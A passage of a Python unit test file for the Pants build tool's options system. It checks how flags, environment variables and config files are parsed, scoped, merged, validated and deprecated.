        known_scope_infos=OptionsTest._known_scope_infos,
        args=shlex.split("./pants"),
    )
    options = create_options_object(env={"PANTS_FOO_BAR": "123"})
    options.register(GLOBAL_SCOPE, "--foo-bar", type=int)
    self.assertEqual(123, options.for_global_scope().foo_bar)
    # A list-valued env var is given in Python-literal syntax; members are coerced to int.
    options = create_options_object(env={"PANTS_FOO_BAR": "['123','456']"})
    options.register(GLOBAL_SCOPE, "--foo-bar", type=list, member_type=int)
    self.assertEqual([123, 456], options.for_global_scope().foo_bar)
def test_arg_scoping(self) -> None:
    """Flags apply to the scope they follow on the command line and are inherited by subscopes."""
    # Some basic smoke tests.
    options = self._parse(flags="--verbose")
    self.assertEqual(True, options.for_global_scope().verbose)
    options = self._parse(flags="-z compile path/to/tgt")
    self.assertEqual(["path/to/tgt"], options.specs)
    self.assertEqual(True, options.for_global_scope().verbose)
    with self.assertRaises(ParseError):
        self._parse(flags="--unregistered-option compile").for_global_scope()
    # Scoping of different values of the same option.
    # Also tests the --no-* boolean flag inverses.
    options = self._parse(flags="--verbose compile.java --no-verbose")
    self.assertEqual(True, options.for_global_scope().verbose)
    self.assertEqual(True, options.for_scope("compile").verbose)
    self.assertEqual(False, options.for_scope("compile.java").verbose)
    options = self._parse(
        flags="--verbose compile --no-verbose compile.java -z test test.junit --no-verbose"
    )
    self.assertEqual(True, options.for_global_scope().verbose)
    self.assertEqual(False, options.for_scope("compile").verbose)
    self.assertEqual(True, options.for_scope("compile.java").verbose)
    self.assertEqual(True, options.for_scope("test").verbose)
    self.assertEqual(False, options.for_scope("test.junit").verbose)
    # Test list-typed option.
    global_options = self._parse(config={"DEFAULT": {"y": ["88", "-99"]}}).for_global_scope()
    self.assertEqual([88, -99], global_options.y)
    # Flag values append to the config-supplied ones, in rank order.
    global_options = self._parse(
        flags="--y=5 --y=-6 --y=77", config={"DEFAULT": {"y": ["88", "-99"]}}
    ).for_global_scope()
    self.assertEqual([88, -99, 5, -6, 77], global_options.y)
    global_options = self._parse().for_global_scope()
    self.assertEqual([], global_options.y)
    global_options = self._parse(
        env={"PANTS_CONFIG_OVERRIDE": "['123','456']"}
    ).for_global_scope()
    self.assertEqual(["123", "456"], global_options.config_override)
    global_options = self._parse(env={"PANTS_CONFIG_OVERRIDE": "['']"}).for_global_scope()
    self.assertEqual([""], global_options.config_override)
    # An explicit (non-+/-) flag value replaces the config value entirely.
    global_options = self._parse(
        flags="--listy='[1, 2]'", config={"DEFAULT": {"listy": "[3, 4]"}}
    ).for_global_scope()
    self.assertEqual([1, 2], global_options.listy)
    # Test dict-typed option.
    global_options = self._parse(flags='--dicty=\'{"c": "d"}\'').for_global_scope()
    self.assertEqual({"c": "d"}, global_options.dicty)
    # Test list-of-dict-typed option.
    global_options = self._parse(
        flags='--dict-listy=\'[{"c": "d"}, {"e": "f"}]\''
    ).for_global_scope()
    self.assertEqual([{"c": "d"}, {"e": "f"}], global_options.dict_listy)
    # Test target-typed option.
    global_options = self._parse().for_global_scope()
    self.assertEqual("//:a", global_options.targety)
    global_options = self._parse(flags="--targety=//:foo").for_global_scope()
    self.assertEqual("//:foo", global_options.targety)
    # Test list-of-target-typed option.
    global_options = self._parse(
        flags='--target-listy=\'["//:foo", "//:bar"]\''
    ).for_global_scope()
    self.assertEqual(["//:foo", "//:bar"], global_options.target_listy)
    # Test file-typed option.
    with temporary_file_path() as fp:
        global_options = self._parse(flags=f'--filey="{fp}"').for_global_scope()
        self.assertEqual(fp, global_options.filey)
    # Test list-of-file-typed option.
    with temporary_file_path() as fp1:
        with temporary_file_path() as fp2:
            global_options = self._parse(
                flags=f'--file-listy="{fp1}" --file-listy="{fp2}"'
            ).for_global_scope()
            self.assertEqual([fp1, fp2], global_options.file_listy)
def test_explicit_boolean_values(self) -> None:
    """An explicit --verbose=<value> accepts both lowercase and capitalized spellings."""
    for raw, parsed in (
        ("false", False),
        ("False", False),
        ("true", True),
        ("True", True),
    ):
        global_options = self._parse(flags=f"--verbose={raw}").for_global_scope()
        assert global_options.verbose is parsed
def test_boolean_defaults(self) -> None:
    """With no flags given, each boolean option reports its registered default."""
    global_options = self._parse().for_global_scope()
    self.assertFalse(global_options.store_true_flag)
    self.assertTrue(global_options.store_false_flag)
    self.assertFalse(global_options.store_true_def_false_flag)
    self.assertTrue(global_options.store_true_def_true_flag)
    self.assertFalse(global_options.store_false_def_false_flag)
    self.assertTrue(global_options.store_false_def_true_flag)
    # A bool option registered with no default is None until set.
    self.assertIsNone(global_options.def_unset_bool_flag)
def test_boolean_set_option(self) -> None:
    """Passing a bare boolean flag sets it per its store-true/store-false semantics."""
    global_options = self._parse(
        flags="--store-true-flag --store-false-flag --store-true-def-true-flag "
        "--store-true-def-false-flag --store-false-def-true-flag --store-false-def-false-flag "
        "--def-unset-bool-flag"
    ).for_global_scope()
    # store-true flags become True; store-false flags become False, regardless of default.
    self.assertTrue(global_options.store_true_flag)
    self.assertFalse(global_options.store_false_flag)
    self.assertTrue(global_options.store_true_def_false_flag)
    self.assertTrue(global_options.store_true_def_true_flag)
    self.assertFalse(global_options.store_false_def_false_flag)
    self.assertFalse(global_options.store_false_def_true_flag)
    self.assertTrue(global_options.def_unset_bool_flag)
def test_boolean_negate_option(self) -> None:
    """The auto-generated --no-* inverse yields the opposite of the bare flag."""
    global_options = self._parse(
        flags="--no-store-true-flag --no-store-false-flag --no-store-true-def-true-flag "
        "--no-store-true-def-false-flag --no-store-false-def-true-flag "
        "--no-store-false-def-false-flag --no-def-unset-bool-flag"
    ).for_global_scope()
    # Each value is the inverse of what the bare flag would set (see test_boolean_set_option).
    self.assertFalse(global_options.store_true_flag)
    self.assertTrue(global_options.store_false_flag)
    self.assertFalse(global_options.store_true_def_false_flag)
    self.assertFalse(global_options.store_true_def_true_flag)
    self.assertTrue(global_options.store_false_def_false_flag)
    self.assertTrue(global_options.store_false_def_true_flag)
    self.assertFalse(global_options.def_unset_bool_flag)
def test_boolean_config_override(self) -> None:
    """Config values (both True and False) override every boolean option's default."""

    def assert_options_set(value: bool) -> None:
        # Set all boolean options to `value` via config and verify each one reflects it.
        global_options = self._parse(
            config={
                "DEFAULT": {
                    "store_true_flag": value,
                    "store_false_flag": value,
                    "store_true_def_true_flag": value,
                    "store_true_def_false_flag": value,
                    "store_false_def_true_flag": value,
                    "store_false_def_false_flag": value,
                    "def_unset_bool_flag": value,
                },
            },
        ).for_global_scope()
        assert global_options.store_true_flag == value
        assert global_options.store_false_flag == value
        assert global_options.store_true_def_false_flag == value
        assert global_options.store_true_def_true_flag == value
        assert global_options.store_false_def_false_flag == value
        assert global_options.store_false_def_true_flag == value
        assert global_options.def_unset_bool_flag == value

    assert_options_set(False)
    assert_options_set(True)
def test_boolean_invalid_value(self) -> None:
    """A config value that cannot be interpreted as a bool raises BooleanConversionError."""
    for bad_value in (11, "AlmostTrue"):
        with self.assertRaises(BooleanConversionError):
            self._parse(config={"DEFAULT": {"store_true_flag": bad_value}}).for_global_scope()
def test_list_option(self) -> None:
    """List options merge +[...] appends and -[...] filters across config, env and flags.

    Precedence (rank) order is: hardcoded default < config < env < flags.
    """

    def check(
        *,
        expected: List[int],
        flags: str = "",
        env_val: Optional[str] = None,
        config_val: Optional[str] = None,
    ) -> None:
        # Build the three sources from the given raw values and compare the merged result.
        env = {"PANTS_GLOBAL_LISTY": env_val} if env_val else None
        config = {"GLOBAL": {"listy": config_val}} if config_val else None
        global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
        assert global_options.listy == expected

    default = [1, 2, 3]
    check(expected=default)
    # Appending to the default.
    check(flags="--listy=4", expected=[*default, 4])
    check(flags="--listy=4 --listy=5", expected=[*default, 4, 5])
    check(flags="--listy=+[4,5]", expected=[*default, 4, 5])
    # Filtering from the default.
    check(flags="--listy=-[2]", expected=[1, 3])
    # Replacing the default.
    check(flags="--listy=[4,5]", expected=[4, 5])
    # Appending across env, config and flags (in the right order).
    check(
        flags="--listy=+[8,9]",
        env_val="+[6,7]",
        config_val="+[4,5]",
        expected=[*default, 4, 5, 6, 7, 8, 9],
    )
    # Appending and filtering across env, config and flags (in the right order).
    check(
        flags="--listy=-[1,5,6]", env_val="+[6,7]", config_val="+[4,5]", expected=[2, 3, 4, 7],
    )
    check(
        flags="--listy=+[8,9]",
        env_val="-[4,5]",
        config_val="+[4,5],-[3]",
        expected=[1, 2, 8, 9],
    )
    # Overwriting from env, then appending and filtering.
    check(
        flags="--listy=+[8,9],-[6]", env_val="[6,7]", config_val="+[4,5]", expected=[7, 8, 9],
    )
    # Overwriting from config, then appending.
    check(
        flags="--listy=+[8,9]",
        env_val="+[6,7]",
        config_val="[4,5]",
        expected=[4, 5, 6, 7, 8, 9],
    )
    # Overwriting from flags.
    check(
        flags="--listy=[8,9]", env_val="+[6,7]", config_val="+[4,5],-[8]", expected=[8, 9],
    )
    # Filtering all instances of repeated values.
    check(
        flags="--listy=-[5]",
        config_val="[1, 2, 5, 3, 4, 5, 6, 5, 5]",
        expected=[1, 2, 3, 4, 6],
    )
    # Filtering a value even though it was appended again at a higher rank.
    check(
        flags="--listy=+[4]", env_val="-[4]", config_val="+[4,5]", expected=[*default, 5],
    )
    # Filtering a value even though it was appended again at the same rank.
    check(
        env_val="-[4],+[4]", config_val="+[4,5]", expected=[*default, 5],
    )
    # Overwriting cancels filters.
    check(env_val="[4]", config_val="-[4]", expected=[4])
def test_dict_list_option(self) -> None:
    """List-of-dict options support append (bare value or +[...]) and replace ([...]) forms."""

    def check(
        *,
        expected: List[Dict[str, int]],
        flags: str = "",
        env_val: Optional[str] = None,
        config_val: Optional[str] = None,
    ) -> None:
        # Exercise exactly one source at a time (or flags alone) and compare the result.
        env = {"PANTS_GLOBAL_DICT_LISTY": env_val} if env_val else None
        config = {"GLOBAL": {"dict_listy": config_val}} if config_val else None
        global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
        assert global_options.dict_listy == expected

    default = [{"a": 1, "b": 2}, {"c": 3}]
    one_element_appended = [*default, {"d": 4, "e": 5}]
    two_elements_appended = [*one_element_appended, {"f": 6}]
    replaced = [{"d": 4, "e": 5}, {"f": 6}]
    check(expected=default)
    check(flags='--dict-listy=\'{"d": 4, "e": 5}\'', expected=one_element_appended)
    check(
        flags='--dict-listy=\'{"d": 4, "e": 5}\' --dict-listy=\'{"f": 6}\'',
        expected=two_elements_appended,
    )
    check(
        flags='--dict-listy=\'+[{"d": 4, "e": 5}, {"f": 6}]\'', expected=two_elements_appended,
    )
    check(flags='--dict-listy=\'[{"d": 4, "e": 5}, {"f": 6}]\'', expected=replaced)
    check(env_val='{"d": 4, "e": 5}', expected=one_element_appended)
    check(env_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
    check(env_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
    check(config_val='{"d": 4, "e": 5}', expected=one_element_appended)
    check(config_val='+[{"d": 4, "e": 5}, {"f": 6}]', expected=two_elements_appended)
    check(config_val='[{"d": 4, "e": 5}, {"f": 6}]', expected=replaced)
def test_target_list_option(self) -> None:
    """List-of-target options support append (bare value or +[...]) and replace ([...]) forms."""

    def check(
        *,
        expected: List[str],
        flags: str = "",
        env_val: Optional[str] = None,
        config_val: Optional[str] = None,
    ) -> None:
        # Exercise exactly one source at a time (or flags alone) and compare the result.
        env = {"PANTS_GLOBAL_TARGET_LISTY": env_val} if env_val else None
        config = {"GLOBAL": {"target_listy": config_val}} if config_val else None
        global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
        assert global_options.target_listy == expected

    default = ["//:a", "//:b"]
    specified_args = ["//:c", "//:d"]
    all_args = [*default, *specified_args]
    check(expected=default)
    check(flags="--target-listy=//:c --target-listy=//:d", expected=all_args)
    check(flags='--target-listy=\'+["//:c", "//:d"]\'', expected=all_args)
    check(flags='--target-listy=\'["//:c", "//:d"]\'', expected=specified_args)
    check(env_val="//:c", expected=[*default, "//:c"])
    check(env_val='+["//:c", "//:d"]', expected=all_args)
    check(env_val='["//:c", "//:d"]', expected=specified_args)
    check(config_val="//:c", expected=[*default, "//:c"])
    check(config_val='+["//:c", "//:d"]', expected=all_args)
    check(config_val='["//:c", "//:d"]', expected=specified_args)
def test_shell_str_list(self) -> None:
    """shell_str list options shlex-split bare values; +[...] appends, [...] replaces."""

    def check(
        *,
        expected: List[str],
        flags: str = "",
        env_val: Optional[str] = None,
        config_val: Optional[str] = None,
    ) -> None:
        # Exercise exactly one source at a time (or flags alone) and compare the result.
        env = {"PANTS_GLOBAL_SHELL_STR_LISTY": env_val} if env_val else None
        config = {"GLOBAL": {"shell_str_listy": config_val}} if config_val else None
        global_options = self._parse(flags=flags, env=env, config=config).for_global_scope()
        assert global_options.shell_str_listy == expected

    default = ["--default1", "--default2=test"]
    specified_args = ["arg1", "arg2=foo", "--arg3"]
    all_args = [*default, *specified_args]
    check(expected=default)
    check(
        flags="--shell-str-listy='arg1 arg2=foo' --shell-str-listy='--arg3'", expected=all_args
    )
    check(flags="""--shell-str-listy='+["arg1 arg2=foo", "--arg3"]'""", expected=all_args)
    check(flags="""--shell-str-listy='["arg1 arg2=foo", "--arg3"]'""", expected=specified_args)
    check(env_val="arg1 arg2=foo --arg3", expected=all_args)
    check(env_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
    check(env_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
    check(config_val="arg1 arg2=foo --arg3", expected=all_args)
    check(config_val='+["arg1 arg2=foo", "--arg3"]', expected=all_args)
    check(config_val='["arg1 arg2=foo", "--arg3"]', expected=specified_args)
def test_dict_option(self) -> None:
    """Dict options replace with {...} and merge with +{...}; higher rank wins per key."""

    def check(
        *, expected: Dict[str, str], flags: str = "", config_val: Optional[str] = None,
    ) -> None:
        config = {"GLOBAL": {"dicty": config_val}} if config_val else None
        global_options = self._parse(flags=flags, config=config).for_global_scope()
        assert global_options.dicty == expected

    default = {"a": "b"}
    specified_args = {"c": "d"}
    all_args = {**default, **specified_args}
    check(expected=default)
    check(flags='--dicty=\'{"c": "d"}\'', expected=specified_args)
    check(flags='--dicty=\'+{"c": "d"}\'', expected=all_args)
    check(config_val='{"c": "d"}', expected=specified_args)
    check(config_val='+{"c": "d"}', expected=all_args)
    check(
        config_val='+{"c": "d"}',
        flags='--dicty=\'+{"e": "f"}\'',
        expected={**all_args, "e": "f"},
    )
    # Check that highest rank wins if we have multiple values for the same key.
    check(config_val='+{"a": "b+", "c": "d"}', expected={"a": "b+", "c": "d"})
    check(
        config_val='+{"a": "b+", "c": "d"}',
        flags='--dicty=\'+{"a": "b++"}\'',
        expected={"a": "b++", "c": "d"},
    )
def test_defaults(self) -> None:
    """Scoped defaults come from the nearest enclosing scope in flags, env, then config."""
    # Hard-coded defaults.
    options = self._parse(flags="compile.java -n33")
    self.assertEqual(99, options.for_global_scope().num)
    self.assertEqual(99, options.for_scope("compile").num)
    self.assertEqual(33, options.for_scope("compile.java").num)
    self.assertEqual(99, options.for_scope("test").num)
    self.assertEqual(99, options.for_scope("test.junit").num)
    options = self._parse(flags="compile -n22 compile.java -n33")
    self.assertEqual(99, options.for_global_scope().num)
    self.assertEqual(22, options.for_scope("compile").num)
    self.assertEqual(33, options.for_scope("compile.java").num)
    # Get defaults from config and environment.
    config = {"DEFAULT": {"num": "88"}, "compile": {"num": "77"}, "compile.java": {"num": "66"}}
    options = self._parse(flags="compile.java -n22", config=config)
    self.assertEqual(88, options.for_global_scope().num)
    self.assertEqual(77, options.for_scope("compile").num)
    self.assertEqual(22, options.for_scope("compile.java").num)
    # An env var on an outer scope beats config values, including on inner scopes.
    env = {"PANTS_COMPILE_NUM": "55"}
    options = self._parse(flags="compile", env=env, config=config)
    self.assertEqual(88, options.for_global_scope().num)
    self.assertEqual(55, options.for_scope("compile").num)
    self.assertEqual(55, options.for_scope("compile.java").num)
    options = self._parse(flags="compile.java -n44", env=env, config=config)
    self.assertEqual(88, options.for_global_scope().num)
    self.assertEqual(55, options.for_scope("compile").num)
    self.assertEqual(44, options.for_scope("compile.java").num)
def test_choices(self) -> None:
    """Options registered with choices accept listed values and reject others at parse time."""
    options = self._parse(flags="--str-choices=foo")
    self.assertEqual("foo", options.for_global_scope().str_choices)
    options = self._parse(config={"DEFAULT": {"str_choices": "bar"}})
    self.assertEqual("bar", options.for_global_scope().str_choices)
    # An out-of-set value raises ParseError whether it came from a flag or from config.
    with self.assertRaises(ParseError):
        options = self._parse(flags="--str-choices=baz")
        options.for_global_scope()
    with self.assertRaises(ParseError):
        options = self._parse(config={"DEFAULT": {"str_choices": "baz"}})
        options.for_global_scope()
    # A list option validates each member against the choices.
    options = self._parse(flags="--int-choices=42 --int-choices=99")
    self.assertEqual([42, 99], options.for_global_scope().int_choices)
def test_parse_name_and_dest(self) -> None:
    """The dest is derived from the flag name unless an explicit dest is supplied."""
    name, dest = Parser.parse_name_and_dest("--thing")
    self.assertEqual("thing", name)
    self.assertEqual("thing", dest)
    name, dest = Parser.parse_name_and_dest("--thing", dest="other_thing")
    self.assertEqual("thing", name)
    self.assertEqual("other_thing", dest)
def test_validation(self) -> None:
    """Invalid registrations raise the specific RegistrationError subclass.

    Fix: the `InvalidMemberType ... member_type=list` assertion was duplicated
    verbatim; the redundant copy has been removed.
    """

    def assertError(expected_error, *args, **kwargs):
        # Register a single option under the global scope and expect `expected_error`.
        with self.assertRaises(expected_error):
            options = Options.create(
                args=[],
                env={},
                config=self._create_config(),
                known_scope_infos=[global_scope()],
            )
            options.register(GLOBAL_SCOPE, *args, **kwargs)
            options.for_global_scope()

    assertError(NoOptionNames)
    assertError(OptionNameDash, "badname")
    assertError(OptionNameDoubleDash, "-badname")
    assertError(InvalidKwarg, "--foo", badkwarg=42)
    assertError(ImplicitValIsNone, "--foo", implicit_value=None)
    assertError(BooleanOptionNameWithNo, "--no-foo", type=bool)
    # member_type is only meaningful for list-typed options.
    assertError(MemberTypeNotAllowed, "--foo", member_type=int)
    assertError(MemberTypeNotAllowed, "--foo", type=dict, member_type=int)
    assertError(InvalidMemberType, "--foo", type=list, member_type=set)
    assertError(InvalidMemberType, "--foo", type=list, member_type=list)
def test_implicit_value(self) -> None:
    """No flag -> default; bare flag -> implicit value; flag=x -> explicit value."""
    cases = (
        ("", "default"),
        ("--implicit-valuey", "implicit"),
        ("--implicit-valuey=explicit", "explicit"),
    )
    for flag, want in cases:
        parsed = self._parse(flags=flag)
        assert parsed.for_global_scope().implicit_valuey == want
def test_shadowing(self) -> None:
    """Registering an option in an inner scope that exists in an outer scope raises Shadowing."""
    options = Options.create(
        env={},
        config=self._create_config(),
        known_scope_infos=[global_scope(), task("bar"), intermediate("foo"), task("foo.bar")],
        args=["./pants"],
    )
    options.register("", "--opt1")
    options.register("foo", "-o", "--opt2")

    def assert_raises_shadowing(*, scope: str, args: List[str]) -> None:
        # Any one shadowed name in `args` is enough to trigger the error.
        with self.assertRaises(Shadowing):
            options.register(scope, *args)

    assert_raises_shadowing(scope="", args=["--opt2"])
    assert_raises_shadowing(scope="bar", args=["--opt1"])
    assert_raises_shadowing(scope="foo.bar", args=["--opt1"])
    assert_raises_shadowing(scope="foo.bar", args=["--opt2"])
    assert_raises_shadowing(scope="foo.bar", args=["--opt1", "--opt3"])
    assert_raises_shadowing(scope="foo.bar", args=["--opt3", "--opt2"])
def test_recursion(self) -> None:
    """Recursive options may be set on subscopes; non-recursive ones may not."""
    # Recursive option.
    options = self._parse(flags="-n=5 compile -n=6")
    self.assertEqual(5, options.for_global_scope().num)
    self.assertEqual(6, options.for_scope("compile").num)
    # Non-recursive option.
    options = self._parse(flags="--bar-baz=foo")
    self.assertEqual("foo", options.for_global_scope().bar_baz)
    # Setting a non-recursive global option on a subscope is a parse error.
    options = self._parse(flags="compile --bar-baz=foo")
    with self.assertRaises(ParseError):
        options.for_scope("compile")
def test_no_recursive_subsystem_options(self) -> None:
    """Explicitly passing `recursive=` when registering a subsystem option is an error."""
    options = Options.create(
        env={},
        config=self._create_config(),
        known_scope_infos=[global_scope(), subsystem("foo")],
        args=["./pants"],
    )
    # All subsystem options are implicitly recursive (a subscope of subsystem scope represents
    # a separate instance of the subsystem, so it needs all the options).
    # We disallow explicit specification of recursive (even if set to True), to avoid confusion.
    with self.assertRaises(RecursiveSubsystemOption):
        options.register("foo", "--bar", recursive=False)
        options.for_scope("foo")
    with self.assertRaises(RecursiveSubsystemOption):
        options.register("foo", "--baz", recursive=True)
        options.for_scope("foo")
def test_is_known_scope(self) -> None:
    """Every registered scope is known; an unregistered scope is not."""
    options = self._parse()
    registered = [scope_info.scope for scope_info in self._known_scope_infos]
    assert all(options.is_known_scope(scope) for scope in registered)
    assert not options.is_known_scope("nonexistent_scope")
def test_designdoc_example(self) -> None:
    """Walk through the worked example from the options design doc."""
    # The example from the design doc.
    # Get defaults from config and environment.
    config = {
        "DEFAULT": {"b": "99"},
        "compile": {"a": "88", "c": "77"},
    }
    env = {"PANTS_COMPILE_C": "66"}
    options = self._parse(
        flags="--a=1 compile --b=2 compile.java --a=3 --c=4", env=env, config=config,
    )
    self.assertEqual(1, options.for_global_scope().a)
    self.assertEqual(99, options.for_global_scope().b)
    # `c` is only registered on the compile scope, so the global scope has no such attribute.
    with self.assertRaises(AttributeError):
        options.for_global_scope().c
    self.assertEqual(1, options.for_scope("compile").a)
    self.assertEqual(2, options.for_scope("compile").b)
    self.assertEqual(66, options.for_scope("compile").c)
    self.assertEqual(3, options.for_scope("compile.java").a)
    self.assertEqual(2, options.for_scope("compile.java").b)
    self.assertEqual(4, options.for_scope("compile.java").c)
def test_file_spec_args(self) -> None:
    """Specs read from --spec-file merge with specs given on the command line."""
    with temporary_file(binary_mode=False) as tmp:
        tmp.write(
            dedent(
                """
                foo
                bar
                """
            )
        )
        tmp.flush()
        # Note that we prevent loading a real pants.toml during get_bootstrap_options().
        flags = f'--spec-file={tmp.name} --pants-config-files="[]" compile morx:tgt fleem:tgt'
        bootstrapper = OptionsBootstrapper.create(args=shlex.split(f"./pants {flags}"))
        bootstrap_options = bootstrapper.bootstrap_options.for_global_scope()
        options = self._parse(flags=flags, bootstrap_option_values=bootstrap_options)
        # Sort for a deterministic comparison: file specs and CLI specs interleave.
        sorted_specs = sorted(options.specs)
        self.assertEqual(["bar", "fleem:tgt", "foo", "morx:tgt"], sorted_specs)
def test_passthru_args_subsystems_and_goals(self):
    """Args after `--` are routed to options registered with passthrough=True.

    Fix: removed a dead `options = self._parse(flags="")` assignment that was
    immediately overwritten by the Options.create() call below.
    """
    # Test that passthrough args are applied.
    options = Options.create(
        env={},
        config=self._create_config(),
        known_scope_infos=[global_scope(), task("test"), subsystem("passconsumer")],
        args=["./pants", "test", "target", "--", "bar", "--baz"],
    )
    options.register(
        "passconsumer", "--passthing", passthrough=True, type=list, member_type=str
    )
    self.assertEqual(["bar", "--baz"], options.for_scope("passconsumer").passthing)
def test_at_most_one_goal_with_passthru_args(self):
    """Passthrough args with more than one goal on the command line are rejected."""
    with self.assertRaisesWithMessageContaining(
        Options.AmbiguousPassthroughError,
        """Specifying multiple goals (in this case: ['test', 'fmt']) """
        """along with passthrough args (args after `--`) is ambiguous.""",
    ):
        _ = Options.create(
            env={},
            config={},
            known_scope_infos=[global_scope(), task("test"), task("fmt")],
            args=["./pants", "test", "fmt", "target", "--", "bar", "--baz"],
        )
def test_global_scope_env_vars(self):
    """Global options honor PANTS_GLOBAL_X, then PANTS_X, then (for pants-* options) X."""

    def check_pants_foo(expected_val, env):
        val = self._parse(env=env).for_global_scope().pants_foo
        self.assertEqual(expected_val, val)

    check_pants_foo(
        "AAA", {"PANTS_GLOBAL_PANTS_FOO": "AAA", "PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"}
    )
    check_pants_foo("BBB", {"PANTS_PANTS_FOO": "BBB", "PANTS_FOO": "CCC"})
    check_pants_foo("CCC", {"PANTS_FOO": "CCC"})
    check_pants_foo(None, {})
    # Check that an empty string is distinct from no value being specified.
    check_pants_foo("", {"PANTS_PANTS_FOO": "", "PANTS_FOO": "CCC"})

    # A global option that doesn't begin with 'pants-': Setting BAR_BAZ should have no effect.
    def check_bar_baz(expected_val, env):
        val = self._parse(env=env).for_global_scope().bar_baz
        self.assertEqual(expected_val, val)

    check_bar_baz(
        "AAA", {"PANTS_GLOBAL_BAR_BAZ": "AAA", "PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"}
    )
    check_bar_baz("BBB", {"PANTS_BAR_BAZ": "BBB", "BAR_BAZ": "CCC"})
    check_bar_baz(None, {"BAR_BAZ": "CCC"})
    check_bar_baz(None, {})
def test_scoped_env_vars(self) -> None:
    """Scoped env vars set scoped options; dots and dashes in the scope map to underscores."""
    cases = (
        ("simple", "PANTS_SIMPLE_SPAM"),
        ("simple-dashed", "PANTS_SIMPLE_DASHED_SPAM"),
        ("scoped.a.bit", "PANTS_SCOPED_A_BIT_SPAM"),
        ("scoped.and-dashed", "PANTS_SCOPED_AND_DASHED_SPAM"),
    )
    for scope, env_var in cases:
        spam = self._parse(env={env_var: "value"}).for_scope(scope).spam
        self.assertEqual("value", spam)
def test_drop_flag_values(self) -> None:
    """drop_flag_values() ignores CLI flags while keeping env, config, and defaults."""
    options = self._parse(
        flags="--bar-baz=fred -n33 --pants-foo=red enum-opt --some-enum=another-value simple -n1",
        env={"PANTS_FOO": "BAR"},
        config={"simple": {"num": 42}, "enum-opt": {"some-enum": "a-value"}},
    )
    defaulted_only_options = options.drop_flag_values()
    # No option value supplied in any form.
    self.assertEqual("fred", options.for_global_scope().bar_baz)
    self.assertIsNone(defaulted_only_options.for_global_scope().bar_baz)
    # A defaulted option value.
    self.assertEqual(33, options.for_global_scope().num)
    self.assertEqual(99, defaulted_only_options.for_global_scope().num)
    # A config specified option value.
    self.assertEqual(1, options.for_scope("simple").num)
    self.assertEqual(42, defaulted_only_options.for_scope("simple").num)
    # An env var specified option value.
    self.assertEqual("red", options.for_global_scope().pants_foo)
    self.assertEqual("BAR", defaulted_only_options.for_global_scope().pants_foo)
    # Overriding an enum option value.
    self.assertEqual(self.SomeEnumOption.another_value, options.for_scope("enum-opt").some_enum)
    # Getting the default value for an enum option.
    self.assertEqual(
        self.SomeEnumOption.a_value,
        defaulted_only_options.for_scope("separate-enum-opt-scope").some_enum_with_default,
    )
def test_enum_option_type_parse_error(self) -> None:
    """A value not matching any enum member fails with a descriptive ParseError."""
    self.maxDiff = None
    with self.assertRaisesWithMessageContaining(
        ParseError,
        "Error applying type 'SomeEnumOption' to option value 'invalid-value', for option "
        "'--some_enum' in scope 'enum-opt'",
    ):
        options = self._parse(flags="enum-opt --some-enum=invalid-value")
        # Accessing the value forces the conversion and therefore the error.
        options.for_scope("enum-opt").some_enum
def assertOptionWarning(self, w, option_string):
    """Assert that `w` holds exactly one DeprecationWarning mentioning `option_string`.

    :param w: the warnings list captured by self.warnings_catcher().
    :param option_string: substring (typically the option's dest) expected in the message.
    """
    single_warning = assert_single_element(w)
    self.assertEqual(single_warning.category, DeprecationWarning)
    warning_message = str(single_warning.message)
    self.assertIn("will be removed in version", warning_message)
    self.assertIn(option_string, warning_message)
def test_deprecated_options(self) -> None:
    """Deprecated options still take effect but emit a DeprecationWarning from any source."""

    def assert_deprecation_triggered(
        *,
        flags: str = "",
        option: str,
        expected: Union[str, bool],
        scope: Optional[str] = None,
        env: Optional[Dict[str, str]] = None,
        config: Optional[Dict[str, Dict[str, str]]] = None,
    ) -> None:
        # Parse with the given sources, check the value took effect, and that exactly
        # one deprecation warning naming the option was emitted.
        with self.warnings_catcher() as w:
            options = self._parse(flags=flags, env=env, config=config)
            scoped_options = (
                options.for_global_scope() if not scope else options.for_scope(scope)
            )
            assert getattr(scoped_options, option) == expected
            self.assertOptionWarning(w, option)

    assert_deprecation_triggered(
        flags="--global-crufty=crufty1", option="global_crufty", expected="crufty1",
    )
    assert_deprecation_triggered(
        flags="--global-crufty-boolean", option="global_crufty_boolean", expected=True,
    )
    assert_deprecation_triggered(
        flags="--no-global-crufty-boolean", option="global_crufty_boolean", expected=False,
    )
    assert_deprecation_triggered(
        flags="stale --crufty=stale_and_crufty",
        scope="stale",
        option="crufty",
        expected="stale_and_crufty",
    )
    assert_scoped_boolean_deprecation = partial(
        assert_deprecation_triggered, scope="stale", option="crufty_boolean"
    )
    assert_scoped_boolean_deprecation(flags="stale --crufty-boolean", expected=True)
    assert_scoped_boolean_deprecation(flags="stale --no-crufty-boolean", expected=False)
    # The scope-qualified flag spellings also trigger the warning.
    assert_scoped_boolean_deprecation(flags="--stale-crufty-boolean", expected=True)
    assert_scoped_boolean_deprecation(flags="--no-stale-crufty-boolean", expected=False)
    assert_deprecation_triggered(
        env={"PANTS_GLOBAL_CRUFTY": "crufty1"}, option="global_crufty", expected="crufty1",
    )
    assert_deprecation_triggered(
        env={"PANTS_STALE_CRUFTY": "stale_and_crufty"},
        scope="stale",
        option="crufty",
        expected="stale_and_crufty",
    )
    assert_deprecation_triggered(
        config={"GLOBAL": {"global_crufty": "crufty1"}},
        option="global_crufty",
        expected="crufty1",
    )
    assert_deprecation_triggered(
        config={"stale": {"crufty": "stale_and_crufty"}},
        scope="stale",
        option="crufty",
        expected="stale_and_crufty",
    )
    # Make sure the warnings don't come out for regular options.
    with self.warnings_catcher() as w:
        self._parse(flags="stale --pants-foo stale --still-good")
        self.assertEqual(0, len(w))
@unittest.mock.patch("pants.base.deprecated.PANTS_SEMVER", Version(_FAKE_CUR_VERSION))
def test_delayed_deprecated_option(self) -> None:
    """A deprecation whose start version is in the future is silent until that version."""
    # Deprecation start version not yet reached: value works, no warning.
    with self.warnings_catcher() as w:
        delayed_deprecation_option_value = (
            self._parse(flags="--global-delayed-deprecated-option=xxx")
            .for_global_scope()
